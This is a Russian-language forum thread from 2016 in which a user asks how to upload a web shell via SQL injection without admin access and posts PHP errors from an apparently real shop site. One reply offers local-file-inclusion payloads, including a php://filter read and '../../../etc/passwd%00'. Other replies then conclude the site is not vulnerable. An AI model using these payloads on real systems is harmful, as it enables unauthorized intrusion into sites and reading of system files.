HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.01.2016, 23:38
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?
 
Ответить с цитированием

  #2  
Старый 03.01.2016, 02:42
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?
если у пользователя есть доступ к file_priv. это все описано в статьях
 
Ответить с цитированием

  #3  
Старый 04.01.2016, 17:38
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Что можно сделать с этим?

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in /home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in /home/piercing/data/www//shop/includes/application_top.php on line 291
 
Ответить с цитированием

  #4  
Старый 04.01.2016, 19:53
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

Обыкновенная AFR же. С суффиксом, разве что, может быть помучаешься, если MQ on.
%00
././[4096]././
Можно по подробнее?
 
Ответить с цитированием

  #5  
Старый 04.01.2016, 21:02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

у вас инклуд или что? покажите полностью запрос и ответ
 
Ответить с цитированием

  #6  
Старый 04.01.2016, 22:25
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

http://www./shop/info.php?id=1'

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291
 
Ответить с цитированием

  #7  
Старый 04.01.2016, 23:00
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

http://www./shop/info.php?id=1
'
Warning
: require(includes/languages/.php): failed to open stream: No such file or directory in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
Fatal error
: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
попробуй так

http://www./shop/info.php?id=php://filter/convert.base64-encode/resource=../index

или так

http://www./shop/info.php?id=../../../etc/passwd%00
 
Ответить с цитированием

  #8  
Старый 05.01.2016, 11:11
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
Тоже самое(

Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291

Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291
 
Ответить с цитированием

  #9  
Старый 05.01.2016, 13:33
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  
где вы видите, что строка из запроса попадает в include? ошибка всегда одна
 
Ответить с цитированием

  #10  
Старый 05.01.2016, 13:55
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

где вы видите, что строка из запроса попадает в include? ошибка всегда одна
Точно.

Извиняюсь за лже показания, раз yarbabin говорит что нет уязвимости, значит её нету
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ